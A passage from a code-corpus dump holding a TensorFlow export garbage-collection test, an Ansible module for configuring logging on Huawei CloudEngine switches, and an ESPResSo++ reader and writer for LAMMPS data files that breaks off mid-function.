from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.contrib.session_bundle import gc
from tensorflow.python.framework import test_util
from tensorflow.python.platform import gfile
from tensorflow.python.platform import test
def tearDownModule():
gfile.DeleteRecursively(test.get_temp_dir())
class GcTest(test_util.TensorFlowTestCase):
def testLargestExportVersions(self):
paths = [gc.Path("/foo", 8), gc.Path("/foo", 9), gc.Path("/foo", 10)]
newest = gc.largest_export_versions(2)
n = newest(paths)
self.assertEquals(n, [gc.Path("/foo", 9), gc.Path("/foo", 10)])
def testLargestExportVersionsDoesNotDeleteZeroFolder(self):
paths = [gc.Path("/foo", 0), gc.Path("/foo", 3)]
newest = gc.largest_export_versions(2)
n = newest(paths)
self.assertEquals(n, [gc.Path("/foo", 0), gc.Path("/foo", 3)])
def testModExportVersion(self):
paths = [
gc.Path("/foo", 4), gc.Path("/foo", 5), gc.Path("/foo", 6),
gc.Path("/foo", 9)
]
mod = gc.mod_export_version(2)
self.assertEquals(mod(paths), [gc.Path("/foo", 4), gc.Path("/foo", 6)])
mod = gc.mod_export_version(3)
self.assertEquals(mod(paths), [gc.Path("/foo", 6), gc.Path("/foo", 9)])
def testOneOfEveryNExportVersions(self):
paths = [
gc.Path("/foo", 0), gc.Path("/foo", 1), gc.Path("/foo", 3),
gc.Path("/foo", 5), gc.Path("/foo", 6), gc.Path("/foo", 7),
gc.Path("/foo", 8), gc.Path("/foo", 33)
]
one_of = gc.one_of_every_n_export_versions(3)
self.assertEquals(
one_of(paths), [
gc.Path("/foo", 3), gc.Path("/foo", 6), gc.Path("/foo", 8),
gc.Path("/foo", 33)
])
def testOneOfEveryNExportVersionsZero(self):
# Zero is a special case since it gets rolled into the first interval.
# Test that here.
paths = [gc.Path("/foo", 0), gc.Path("/foo", 4), gc.Path("/foo", 5)]
one_of = gc.one_of_every_n_export_versions(3)
self.assertEquals(one_of(paths), [gc.Path("/foo", 0), gc.Path("/foo", 5)])
def testUnion(self):
paths = []
for i in xrange(10):
paths.append(gc.Path("/foo", i))
f = gc.union(gc.largest_export_versions(3), gc.mod_export_version(3))
self.assertEquals(
f(paths), [
gc.Path("/foo", 0), gc.Path("/foo", 3), gc.Path("/foo", 6),
gc.Path("/foo", 7), gc.Path("/foo", 8), gc.Path("/foo", 9)
])
def testNegation(self):
paths = [
gc.Path("/foo", 4), gc.Path("/foo", 5), gc.Path("/foo", 6),
gc.Path("/foo", 9)
]
mod = gc.negation(gc.mod_export_version(2))
self.assertEquals(mod(paths), [gc.Path("/foo", 5), gc.Path("/foo", 9)])
mod = gc.negation(gc.mod_export_version(3))
self.assertEquals(mod(paths), [gc.Path("/foo", 4), gc.Path("/foo", 5)])
def testPathsWithParse(self):
base_dir = os.path.join(test.get_temp_dir(), "paths_parse")
self.assertFalse(gfile.Exists(base_dir))
for p in xrange(3):
gfile.MakeDirs(os.path.join(base_dir, "%d" % p))
# add a base_directory to ignore
gfile.MakeDirs(os.path.join(base_dir, "ignore"))
# create a simple parser that pulls the export_version from the directory.
def parser(path):
match = re.match("^" + base_dir + "/(\\d+)$", path.path)
if not match:
return None
return path._replace(export_version=int(match.group(1)))
self.assertEquals(
gc.get_paths(
base_dir, parser=parser), [
gc.Path(os.path.join(base_dir, "0"), 0),
gc.Path(os.path.join(base_dir, "1"), 1),
gc.Path(os.path.join(base_dir, "2"), 2)
])
if __name__ == "__main__":
test.main()
| apache-2.0 |
cetic/ansible | lib/ansible/modules/network/cloudengine/ce_info_center_log.py | 42 | 20630 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'metadata_version': '1.0'}
DOCUMENTATION = """
---
module: ce_info_center_log
version_added: "2.4"
short_description: Manages information center log configuration on HUAWEI CloudEngine switches.
description:
- Setting the Timestamp Format of Logs.
Configuring the Device to Output Logs to the Log Buffer.
author: QijunPan (@CloudEngine-Ansible)
options:
log_time_stamp:
description:
- Sets the timestamp format of logs.
required: false
default: null
choices: ['date_boot', 'date_second', 'date_tenthsecond', 'date_millisecond',
'shortdate_second', 'shortdate_tenthsecond', 'shortdate_millisecond',
'formatdate_second', 'formatdate_tenthsecond', 'formatdate_millisecond']
log_buff_enable:
description:
- Enables the Switch to send logs to the log buffer.
required: false
default: no_use
choices: ['no_use','true', 'false']
log_buff_size:
description:
- Specifies the maximum number of logs in the log buffer.
The value is an integer that ranges from 0 to 10240. If logbuffer-size is 0, logs are not displayed.
required: false
default: null
module_name:
description:
- Specifies the name of a module.
The value is a module name in registration logs.
required: false
default: null
channel_id:
description:
- Specifies a channel ID.
The value is an integer ranging from 0 to 9.
required: false
default: null
log_enable:
description:
- Indicates whether log filtering is enabled.
required: false
default: no_use
choices: ['no_use','true', 'false']
log_level:
description:
- Specifies a log severity.
required: false
default: null
choices: ['emergencies', 'alert', 'critical', 'error',
'warning', 'notification', 'informational', 'debugging']
state:
description:
- Determines whether the config should be present or not
on the device.
required: false
default: present
choices: ['present', 'absent']
"""
EXAMPLES = '''
- name: CloudEngine info center log test
hosts: cloudengine
connection: local
gather_facts: no
vars:
cli:
host: "{{ inventory_hostname }}"
port: "{{ ansible_ssh_port }}"
username: "{{ username }}"
password: "{{ password }}"
transport: cli
tasks:
- name: "Setting the timestamp format of logs"
ce_info_center_log:
log_time_stamp: date_tenthsecond
provider: "{{ cli }}"
- name: "Enabled to output information to the log buffer"
ce_info_center_log:
log_buff_enable: true
provider: "{{ cli }}"
- name: "Set the maximum number of logs in the log buffer"
ce_info_center_log:
log_buff_size: 100
provider: "{{ cli }}"
- name: "Set a rule for outputting logs to a channel"
ce_info_center_log:
module_name: aaa
channel_id: 1
log_enable: true
log_level: critical
provider: "{{ cli }}"
'''
RETURN = '''
proposed:
description: k/v pairs of parameters passed into module
returned: verbose mode
type: dict
sample: {"log_time_stamp": "date_tenthsecond", "state": "present"}
existing:
description: k/v pairs of existing configuration
returned: verbose mode
type: dict
sample: {"log_time_stamp": "date_second"}
end_state:
description: k/v pairs of configuration after module execution
returned: verbose mode
type: dict
sample: {"log_time_stamp": "date_tenthsecond"}
updates:
description: commands sent to the device
returned: always
type: list
sample: ["info-center timestamp log date precision-time tenth-second"]
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
'''
from xml.etree import ElementTree
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.ce import get_nc_config, set_nc_config, ce_argument_spec
CE_NC_GET_LOG = """
<filter type="subtree">
<syslog xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
<globalParam>
<bufferSize></bufferSize>
<logTimeStamp></logTimeStamp>
<icLogBuffEn></icLogBuffEn>
</globalParam>
<icSources>
<icSource>
<moduleName>%s</moduleName>
<icChannelId>%s</icChannelId>
<icChannelName></icChannelName>
<logEnFlg></logEnFlg>
<logEnLevel></logEnLevel>
</icSource>
</icSources>
</syslog>
</filter>
"""
CE_NC_GET_LOG_GLOBAL = """
<filter type="subtree">
<syslog xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
<globalParam>
<bufferSize></bufferSize>
<logTimeStamp></logTimeStamp>
<icLogBuffEn></icLogBuffEn>
</globalParam>
</syslog>
</filter>
"""
TIME_STAMP_DICT = {"date_boot": "boot",
"date_second": "date precision-time second",
"date_tenthsecond": "date precision-time tenth-second",
"date_millisecond": "date precision-time millisecond",
"shortdate_second": "short-date precision-time second",
"shortdate_tenthsecond": "short-date precision-time tenth-second",
"shortdate_millisecond": "short-date precision-time millisecond",
"formatdate_second": "format-date precision-time second",
"formatdate_tenthsecond": "format-date precision-time tenth-second",
"formatdate_millisecond": "format-date precision-time millisecond"}
CHANNEL_DEFAULT_LOG_STATE = {"0": "true",
"1": "true",
"2": "true",
"3": "false",
"4": "true",
"5": "false",
"6": "true",
"7": "true",
"8": "true",
"9": "true"}
CHANNEL_DEFAULT_LOG_LEVEL = {"0": "warning",
"1": "warning",
"2": "informational",
"3": "informational",
"4": "warning",
"5": "debugging",
"6": "debugging",
"7": "warning",
"8": "debugging",
"9": "debugging"}
class InfoCenterLog(object):
"""
Manages information center log configuration
"""
def __init__(self, argument_spec):
self.spec = argument_spec
self.module = None
self.init_module()
# module input info
self.log_time_stamp = self.module.params['log_time_stamp']
self.log_buff_enable = self.module.params['log_buff_enable']
self.log_buff_size = self.module.params['log_buff_size']
self.module_name = self.module.params['module_name']
self.channel_id = self.module.params['channel_id']
self.log_enable = self.module.params['log_enable']
self.log_level = self.module.params['log_level']
self.state = self.module.params['state']
# state
self.log_dict = dict()
self.changed = False
self.updates_cmd = list()
self.commands = list()
self.results = dict()
self.proposed = dict()
self.existing = dict()
self.end_state = dict()
def init_module(self):
"""init module"""
self.module = AnsibleModule(argument_spec=self.spec, supports_check_mode=True)
def check_response(self, xml_str, xml_name):
"""Check if response message is already succeed"""
if "<ok/>" not in xml_str:
self.module.fail_json(msg='Error: %s failed.' % xml_name)
def get_log_dict(self):
""" log config dict"""
log_dict = dict()
if self.module_name:
if self.module_name.lower() == "default":
conf_str = CE_NC_GET_LOG % (self.module_name.lower(), self.channel_id)
else:
conf_str = CE_NC_GET_LOG % (self.module_name.upper(), self.channel_id)
else:
conf_str = CE_NC_GET_LOG_GLOBAL
xml_str = get_nc_config(self.module, conf_str)
if "<data/>" in xml_str:
return log_dict
xml_str = xml_str.replace('\r', '').replace('\n', '').\
replace('xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"', "").\
replace('xmlns="http://www.huawei.com/netconf/vrp"', "")
root = ElementTree.fromstring(xml_str)
# get global param info
glb = root.find("data/syslog/globalParam")
if glb:
for attr in glb:
if attr.tag in ["bufferSize", "logTimeStamp", "icLogBuffEn"]:
log_dict[attr.tag] = attr.text
# get info-center source info
log_dict["source"] = dict()
src = root.find("data/syslog/icSources/icSource")
if src:
for attr in src:
if attr.tag in ["moduleName", "icChannelId", "icChannelName", "logEnFlg", "logEnLevel"]:
log_dict["source"][attr.tag] = attr.text
return log_dict
def config_log_global(self):
"""config log global param"""
xml_str = '<globalParam operation="merge">'
if self.log_time_stamp:
if self.state == "present" and self.log_time_stamp.upper() != self.log_dict.get("logTimeStamp"):
xml_str += '<logTimeStamp>%s</logTimeStamp>' % self.log_time_stamp.upper()
self.updates_cmd.append(
"info-center timestamp log %s" % TIME_STAMP_DICT.get(self.log_time_stamp))
elif self.state == "absent" and self.log_time_stamp.upper() == self.log_dict.get("logTimeStamp"):
xml_str += '<logTimeStamp>DATE_SECOND</logTimeStamp>' # set default
self.updates_cmd.append("undo info-center timestamp log")
else:
pass
if self.log_buff_enable != 'no_use':
if self.log_dict.get("icLogBuffEn") != self.log_buff_enable:
xml_str += '<icLogBuffEn>%s</icLogBuffEn>' % self.log_buff_enable
if self.log_buff_enable == "true":
self.updates_cmd.append("info-center logbuffer")
else:
self.updates_cmd.append("undo info-center logbuffer")
if self.log_buff_size:
if self.state == "present" and self.log_dict.get("bufferSize") != self.log_buff_size:
xml_str += '<bufferSize>%s</bufferSize>' % self.log_buff_size
self.updates_cmd.append(
"info-center logbuffer size %s" % self.log_buff_size)
elif self.state == "absent" and self.log_dict.get("bufferSize") == self.log_buff_size:
xml_str += '<bufferSize>512</bufferSize>'
self.updates_cmd.append("undo info-center logbuffer size")
if xml_str == '<globalParam operation="merge">':
return ""
else:
xml_str += '</globalParam>'
return xml_str
    def config_log_source(self):
"""config info-center sources"""
xml_str = ''
if not self.module_name or not self.channel_id:
return xml_str
source = self.log_dict["source"]
if self.state == "present":
xml_str = '<icSources><icSource operation="merge">'
cmd = 'info-center source %s channel %s log' % (
self.module_name, self.channel_id)
else:
if not source or self.module_name != source.get("moduleName").lower() or \
self.channel_id != source.get("icChannelId"):
return ''
if self.log_enable == 'no_use' and not self.log_level:
xml_str = '<icSources><icSource operation="delete">'
else:
xml_str = '<icSources><icSource operation="merge">'
cmd = 'undo info-center source %s channel %s log' % (
self.module_name, self.channel_id)
xml_str += '<moduleName>%s</moduleName><icChannelId>%s</icChannelId>' % (
self.module_name, self.channel_id)
# log_enable
if self.log_enable != 'no_use':
if self.state == "present" and (not source or self.log_enable != source.get("logEnFlg")):
xml_str += '<logEnFlg>%s</logEnFlg>' % self.log_enable
if self.log_enable == "true":
cmd += ' state on'
else:
cmd += ' state off'
elif self.state == "absent" and source and self.log_level == source.get("logEnLevel"):
xml_str += '<logEnFlg>%s</logEnFlg>' % CHANNEL_DEFAULT_LOG_STATE.get(self.channel_id)
cmd += ' state'
# log_level
if self.log_level:
if self.state == "present" and (not source or self.log_level != source.get("logEnLevel")):
xml_str += '<logEnLevel>%s</logEnLevel>' % self.log_level
cmd += ' level %s' % self.log_level
elif self.state == "absent" and source and self.log_level == source.get("logEnLevel"):
xml_str += '<logEnLevel>%s</logEnLevel>' % CHANNEL_DEFAULT_LOG_LEVEL.get(self.channel_id)
cmd += ' level'
if xml_str.endswith("</icChannelId>"):
if self.log_enable == 'no_use' and not self.log_level and self.state == "absent":
xml_str += '</icSource></icSources>'
self.updates_cmd.append(cmd)
return xml_str
else:
return ''
else:
xml_str += '</icSource></icSources>'
self.updates_cmd.append(cmd)
return xml_str
def netconf_load_config(self, xml_str):
"""load log config by netconf"""
if not xml_str:
return
xml_cfg = """
<config>
<syslog xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
%s
</syslog>
</config>""" % xml_str
recv_xml = set_nc_config(self.module, xml_cfg)
self.check_response(recv_xml, "SET_LOG")
self.changed = True
def check_params(self):
"""Check all input params"""
# check log_buff_size ranges from 0 to 10240
if self.log_buff_size:
if not self.log_buff_size.isdigit():
self.module.fail_json(
msg="Error: log_buff_size is not digit.")
if int(self.log_buff_size) < 0 or int(self.log_buff_size) > 10240:
self.module.fail_json(
msg="Error: log_buff_size is not ranges from 0 to 10240.")
# check channel_id ranging from 0 to 9
if self.channel_id:
if not self.channel_id.isdigit():
self.module.fail_json(msg="Error: channel_id is not digit.")
if int(self.channel_id) < 0 or int(self.channel_id) > 9:
self.module.fail_json(
msg="Error: channel_id is not ranges from 0 to 9.")
# module_name and channel_id must be set at the same time
if bool(self.module_name) != bool(self.channel_id):
self.module.fail_json(
msg="Error: module_name and channel_id must be set at the same time.")
def get_proposed(self):
"""get proposed info"""
if self.log_time_stamp:
self.proposed["log_time_stamp"] = self.log_time_stamp
if self.log_buff_enable != 'no_use':
self.proposed["log_buff_enable"] = self.log_buff_enable
if self.log_buff_size:
self.proposed["log_buff_size"] = self.log_buff_size
if self.module_name:
self.proposed["module_name"] = self.module_name
if self.channel_id:
self.proposed["channel_id"] = self.channel_id
if self.log_enable != 'no_use':
self.proposed["log_enable"] = self.log_enable
if self.log_level:
self.proposed["log_level"] = self.log_level
self.proposed["state"] = self.state
def get_existing(self):
"""get existing info"""
if not self.log_dict:
return
if self.log_time_stamp:
self.existing["log_time_stamp"] = self.log_dict.get("logTimeStamp").lower()
if self.log_buff_enable != 'no_use':
self.existing["log_buff_enable"] = self.log_dict.get("icLogBuffEn")
if self.log_buff_size:
self.existing["log_buff_size"] = self.log_dict.get("bufferSize")
if self.module_name:
self.existing["source"] = self.log_dict.get("source")
def get_end_state(self):
"""get end state info"""
log_dict = self.get_log_dict()
if not log_dict:
return
if self.log_time_stamp:
self.end_state["log_time_stamp"] = log_dict.get("logTimeStamp").lower()
if self.log_buff_enable != 'no_use':
self.end_state["log_buff_enable"] = log_dict.get("icLogBuffEn")
if self.log_buff_size:
self.end_state["log_buff_size"] = log_dict.get("bufferSize")
if self.module_name:
self.end_state["source"] = log_dict.get("source")
def work(self):
"""worker"""
self.check_params()
self.log_dict = self.get_log_dict()
self.get_existing()
self.get_proposed()
# deal present or absent
xml_str = ''
if self.log_time_stamp or self.log_buff_enable != 'no_use' or self.log_buff_size:
xml_str += self.config_log_global()
if self.module_name:
            xml_str += self.config_log_source()
if xml_str:
self.netconf_load_config(xml_str)
self.changed = True
self.get_end_state()
self.results['changed'] = self.changed
self.results['proposed'] = self.proposed
self.results['existing'] = self.existing
self.results['end_state'] = self.end_state
if self.changed:
self.results['updates'] = self.updates_cmd
else:
self.results['updates'] = list()
self.module.exit_json(**self.results)
def main():
"""Module main"""
argument_spec = dict(
log_time_stamp=dict(required=False, type='str',
choices=['date_boot', 'date_second', 'date_tenthsecond', 'date_millisecond',
'shortdate_second', 'shortdate_tenthsecond', 'shortdate_millisecond',
'formatdate_second', 'formatdate_tenthsecond', 'formatdate_millisecond']),
log_buff_enable=dict(type='str', default='no_use', choices=['no_use', 'true', 'false']),
log_buff_size=dict(required=False, type='str'),
module_name=dict(required=False, type='str'),
channel_id=dict(required=False, type='str'),
log_enable=dict(type='str', default='no_use', choices=['no_use', 'true', 'false']),
log_level=dict(required=False, type='str',
choices=['emergencies', 'alert', 'critical', 'error',
'warning', 'notification', 'informational', 'debugging']),
state=dict(required=False, default='present',
choices=['present', 'absent'])
)
argument_spec.update(ce_argument_spec)
module = InfoCenterLog(argument_spec)
module.work()
if __name__ == '__main__':
main()
| gpl-3.0 |
kkreis/espressopp | src/tools/lammps.py | 7 | 16178 | # Copyright (C) 2012,2013
# Max Planck Institute for Polymer Research
# Copyright (C) 2008,2009,2010,2011
# Max-Planck-Institute for Polymer Research & Fraunhofer SCAI
#
# This file is part of ESPResSo++.
#
# ESPResSo++ is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo++ is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
**************************
lammps - read lammps files
**************************
This Python module allows one to use a LAMMPS data file as the
input to an ESPResSo++ simulation.
"""
import espressopp
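# Minimal usage sketch (hedged: 'polymer.dat' is an illustrative filename, the
# module is assumed importable as espressopp.tools.lammps, and the unpacking
# assumes a file with bonds but no angles, dihedrals or velocities; read()
# returns a different tuple for other file contents):
#
#   bonds, x, y, z, Lx, Ly, Lz = espressopp.tools.lammps.read('polymer.dat')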
def read(fin):
f = open(fin)
line = f.readline() # comment line
while not 'atoms' in line: #skip possible blank line
line = f.readline()
num_particles = int(line.split()[0])
num_bonds = int(f.readline().split()[0])
num_angles = int(f.readline().split()[0])
num_dihedrals = int(f.readline().split()[0])
line = f.readline() # impropers
line = f.readline() # blank line
line = f.readline() # atom types and maybe the word "velocities"
num_types = int(line.split()[0])
    velocities = 'velocities' in line  # TODO fix this? why should there be the velocity keyword?
# find and store size of box
line = ''
while not 'xlo' in line:
line = f.readline()
xmin, xmax = map(float, line.split()[0:2])
ymin, ymax = map(float, f.readline().split()[0:2])
zmin, zmax = map(float, f.readline().split()[0:2])
Lx = xmax - xmin
Ly = ymax - ymin
Lz = zmax - zmin
# find and store coordinates
line = ''
while not 'Atoms' in line:
line = f.readline()
line = f.readline()
if(num_types == 1):
rstart = 3
if(num_bonds == 0): rstart = 2
x = []
y = []
z = []
for i in xrange(num_particles):
rx, ry, rz = map(float, f.readline().split()[rstart:])
x.append(rx)
y.append(ry)
z.append(rz)
else:
p_type = []
q = []
x = []
y = []
z = []
for i in xrange(num_particles):
k, rq, rx, ry, rz = map(float, f.readline().split()[2:])
p_type.append(int(k))
q.append(rq)
x.append(rx)
y.append(ry)
z.append(rz)
if(num_bonds != 0):
# find and store bonds
line = ''
while not 'Bonds' in line:
line = f.readline()
line = f.readline()
bonds = []
for i in xrange(num_bonds):
bond_id, bond_type, pid1, pid2 = map(int, f.readline().split())
bonds.append((pid1, pid2))
if(num_angles != 0):
# find and store angles
line = ''
while not 'Angles' in line:
line = f.readline()
line = f.readline()
angles = []
for i in xrange(num_angles):
angle_id, angle_type, pid1, pid2, pid3 = map(int, f.readline().split())
angles.append((pid1, pid2, pid3))
if(num_dihedrals != 0):
        # find and store dihedrals
line = ''
while not 'Dihedrals' in line:
line = f.readline()
line = f.readline()
dihedrals = []
for i in xrange(num_dihedrals):
dihedral_id, dihedral_type, pid1, pid2, pid3, pid4 = map(int, f.readline().split())
dihedrals.append((pid1, pid2, pid3, pid4))
if(velocities):
# find and store velocities
line = ''
while not 'Velocities' in line:
line = f.readline()
line = f.readline() # blank line
vx = []
vy = []
vz = []
for i in xrange(num_particles):
vx_, vy_, vz_ = map(float, f.readline().split()[1:])
vx.append(vx_)
vy.append(vy_)
vz.append(vz_)
f.close()
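    # Which tuple is returned depends on what the data file contained
    # (multiple atom types, bonds, angles, dihedrals, velocities); the
    # branches below enumerate the supported combinations.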
if(num_types != 1):
return p_type, bonds, angles, q, x, y, z, Lx, Ly, Lz
if(num_bonds == 0 and num_angles == 0 and num_dihedrals == 0 and not velocities):
return x, y, z, Lx, Ly, Lz
if(num_bonds == 0 and num_angles == 0 and num_dihedrals == 0 and velocities):
return x, y, z, Lx, Ly, Lz, vx, vy, vz
elif(num_bonds != 0 and num_angles == 0 and num_dihedrals == 0):
return bonds, x, y, z, Lx, Ly, Lz
elif(num_bonds != 0 and num_angles != 0 and num_dihedrals == 0):
return bonds, angles, x, y, z, Lx, Ly, Lz
else:
return bonds, angles, dihedrals, x, y, z, Lx, Ly, Lz
def read_charmm(fin):
f = open(fin)
line = f.readline() # comment line
while not 'atoms' in line: #skip possible blank line
line = f.readline()
num_particles = int(line.split()[0])
num_bonds = int(f.readline().split()[0])
num_angles = int(f.readline().split()[0])
num_dihedrals = int(f.readline().split()[0])
num_impropers = int(f.readline().split()[0])
line = f.readline() # blank line
line = f.readline() # atom types
num_types = int(line.split()[0])
line = f.readline() # bond types
num_bond_types = int(line.split()[0])
line = f.readline() # angle types
num_angle_types = int(line.split()[0])
line = f.readline() # dihedral types
num_dihedral_types = int(line.split()[0])
line = f.readline() # impropers types
num_improper_types = int(line.split()[0])
    velocities = 'velocities' in line  # TODO fix this? why should there be the velocity keyword?
# find and store size of box
line = ''
while not 'xlo' in line:
line = f.readline()
xmin, xmax = map(float, line.split()[0:2])
ymin, ymax = map(float, f.readline().split()[0:2])
zmin, zmax = map(float, f.readline().split()[0:2])
Lx = xmax - xmin
Ly = ymax - ymin
Lz = zmax - zmin
#find and store masses
line = ''
while not 'Masses' in line:
line = f.readline()
line = f.readline()
masses = []
dumm = 0.0
masses.append(dumm)
for i in xrange(num_types):
rmass = float(f.readline().split()[1])
masses.append(rmass)
#find and store LJ param
line = ''
while not 'Pair Coeffs' in line:
line = f.readline()
line = f.readline()
epsilon = []
sigma = []
dumm = 0.0
epsilon.append(dumm)
sigma.append(dumm)
for i in xrange(num_types):
repsilon, rsigma = map(float, f.readline().split()[1:3])
epsilon.append(repsilon)
sigma.append(rsigma)
# find and store coordinates
line = ''
while not 'Atoms' in line:
line = f.readline()
line = f.readline()
if(num_types == 1):
rstart = 3
if(num_bonds == 0): rstart = 2
p_type = []
q = []
x = []
y = []
z = []
for i in xrange(num_particles):
rx, ry, rz = map(float,f.readline().split()[rstart:])
x.append(rx)
y.append(ry)
z.append(rz)
else:
p_type = []
q = []
x = []
y = []
z = []
for i in xrange(num_particles):
k, rq, rx, ry, rz = map(float, f.readline().split()[2:])
p_type.append(int(k))
q.append(rq)
x.append(rx)
y.append(ry)
z.append(rz)
if(num_bonds != 0):
# find and store bond coeff
line = ''
while not 'Bond Coeffs' in line:
line = f.readline()
line = f.readline()
K = []
r0 = []
dumm = 0.0
K.append(dumm)
r0.append(dumm)
for i in xrange(num_bond_types):
rK, rr0 = map(float, f.readline().split()[1:3])
K.append(rK)
r0.append(rr0)
if(num_bonds != 0):
# find and store bonds
line = ''
while not 'Bonds' in line:
line = f.readline()
line = f.readline()
bonds = []
bonds_type_arr = []
for i in xrange(num_bonds):
bond_id, bond_type, pid1, pid2 = map(int, f.readline().split())
bonds.append((pid1, pid2))
bonds_type_arr.append(bond_type)
if(num_angles != 0):
# find and store angle coeff
line = ''
while not 'Angle Coeffs' in line:
line = f.readline()
line = f.readline()
Kt = []
t0 = []
dumm = 0.0
Kt.append(dumm)
t0.append(dumm)
        for i in xrange(num_angle_types):
rKt, rt0 = map(float, f.readline().split()[1:3])
Kt.append(rKt)
t0.append(rt0)
if(num_angles != 0):
# find and store angles
line = ''
while not 'Angles' in line:
line = f.readline()
line = f.readline()
angles = []
angles_type_arr = []
for i in xrange(num_angles):
angle_id, angle_type, pid1, pid2, pid3 = map(int, f.readline().split())
angles.append((pid1, pid2, pid3))
angles_type_arr.append(angle_type)
if(num_dihedrals != 0):
# find and store dihedrals coeff
line = ''
while not 'Dihedral Coeffs' in line:
line = f.readline()
line = f.readline()
Kdh = []
ndh = []
ph0 = []
dumm = 0.0
Kdh.append(dumm)
ndh.append(dumm)
ph0.append(dumm)
        for i in xrange(num_dihedral_types):
rKdh, rndh, rph0 = map(float, f.readline().split()[1:4])
Kdh.append(rKdh)
ndh.append(rndh)
ph0.append(rph0)
if(num_dihedrals != 0):
# find and store dihedrals
line = ''
while not 'Dihedrals' in line:
line = f.readline()
line = f.readline()
dihedrals = []
dihedrals_type_arr = []
for i in xrange(num_dihedrals):
dihedral_id, dihedral_type, pid1, pid2, pid3, pid4 = map(int, f.readline().split())
dihedrals.append((pid1, pid2, pid3, pid4))
dihedrals_type_arr.append(dihedral_type)
if(velocities):
# find and store velocities
line = ''
while not 'Velocities' in line:
line = f.readline()
line = f.readline() # blank line
vx = []
vy = []
vz = []
for i in xrange(num_particles):
vx_, vy_, vz_ = map(float, f.readline().split()[1:])
vx.append(vx_)
vy.append(vy_)
vz.append(vz_)
f.close()
if(num_bonds == 0 and num_angles == 0 and num_dihedrals == 0 and not velocities):
return p_type, masses, epsilon, sigma, q, x, y, z, Lx, Ly, Lz
if(num_bonds == 0 and num_angles == 0 and num_dihedrals == 0 and velocities):
return p_type, masses, epsilon, sigma, q, x, y, z, Lx, Ly, Lz, vx, vy, vz
if(num_bonds != 0 and num_angles == 0 and num_dihedrals == 0 and not velocities):
return p_type, masses, epsilon, sigma, K, r0, bonds, bonds_type_arr, q, x, y, z, Lx, Ly, Lz
if(num_bonds != 0 and num_angles == 0 and num_dihedrals == 0 and velocities):
return p_type, masses, epsilon, sigma, K, r0, bonds, bonds_type_arr, q, x, y, z, Lx, Ly, Lz, vx, vy, vz
if(num_bonds != 0 and num_angles != 0 and num_dihedrals == 0 and not velocities):
return p_type, masses, epsilon, sigma, K, r0, bonds, bonds_type_arr, Kt, t0, angles, angles_type_arr, q, x, y, z, Lx, Ly, Lz
if(num_bonds != 0 and num_angles != 0 and num_dihedrals == 0 and velocities):
return p_type, masses, epsilon, sigma, K, r0, bonds, bonds_type_arr, Kt, t0, angles, angles_type_arr, q, x, y, z, Lx, Ly, Lz, vx, vy, vz
if(num_bonds != 0 and num_angles != 0 and num_dihedrals != 0 and not velocities):
return p_type, masses, epsilon, sigma, K, r0, bonds, bonds_type_arr, Kt, t0, angles, angles_type_arr, Kdh, ndh, ph0, dihedrals, dihedrals_type_arr, q, x, y, z, Lx, Ly, Lz
if(num_bonds != 0 and num_angles != 0 and num_dihedrals != 0 and velocities):
return p_type, masses, epsilon, sigma, K, r0, bonds, bonds_type_arr, Kt, t0, angles, angles_type_arr, Kdh, ndh, ph0, dihedrals, dihedrals_type_arr, q, x, y, z, Lx, Ly, Lz, vx, vy, vz
def write(fout, system, writeVelocities=False):
# first collect all the information that we need to write into the file
numParticles = int(espressopp.analysis.NPart(system).compute())
box_x = system.bc.boxL[0]
box_y = system.bc.boxL[1]
box_z = system.bc.boxL[2]
bonds = []
nbondtypes = 0
angles = []
nangletypes = 0
dihedrals = []
ndihedraltypes = 0
nInteractions = system.getNumberOfInteractions()
for i in xrange(nInteractions):
bT = system.getInteraction(i).bondType()
if bT == espressopp.interaction.Pair:
nbondtypes += 1
bl = system.getInteraction(i).getFixedPairList().getBonds()
bln = []
for j in xrange(len(bl)):
bln.extend(bl[j])
bonds.append(bln)
elif bT == espressopp.interaction.Angular:
nangletypes += 1
an = system.getInteraction(i).getFixedTripleList().getTriples()
ann = []
for j in xrange(len(an)):
ann.extend(an[j])
angles.append(ann)
elif bT == espressopp.interaction.Dihedral:
ndihedraltypes += 1
di = system.getInteraction(i).getFixedQuadrupleList().getQuadruples()
din = []
for j in xrange(len(di)):
din.extend(di[j])
dihedrals.append(din)
nbonds = 0
for i in xrange(len(bonds)):
nbonds += len(bonds[i])
nangles = 0
for i in xrange(len(angles)):
nangles += len(angles[i])
ndihedrals = 0
for i in xrange(len(dihedrals)):
ndihedrals += len(dihedrals[i])
atomtypes = []
maxParticleID = int(espressopp.analysis.MaxPID(system).compute())
pid = 0
    while pid <= maxParticleID:
        if system.storage.particleExists(pid):
            particle = system.storage.getParticle(pid)
            type = particle.type
            # record each particle type once
            if type not in atomtypes:
                atomtypes.append(type)
        pid += 1
natomtypes = len(atomtypes)
# now we can write the file
file = open(fout,'w')
file.write('LAMMPS\n\n')
file.write('%5d atoms\n' % numParticles)
file.write('%5d bonds\n' % nbonds)
file.write('%5d angles\n' % nangles)
file.write('%5d dihedrals\n' % ndihedrals)
#impropers are not supported yet
file.write('%5d impropers\n\n' % 0)
file.write('%5d atom types\n' % natomtypes)
file.write('%5d bond types\n' % nbondtypes)
file.write('%5d angle types\n' % nangletypes)
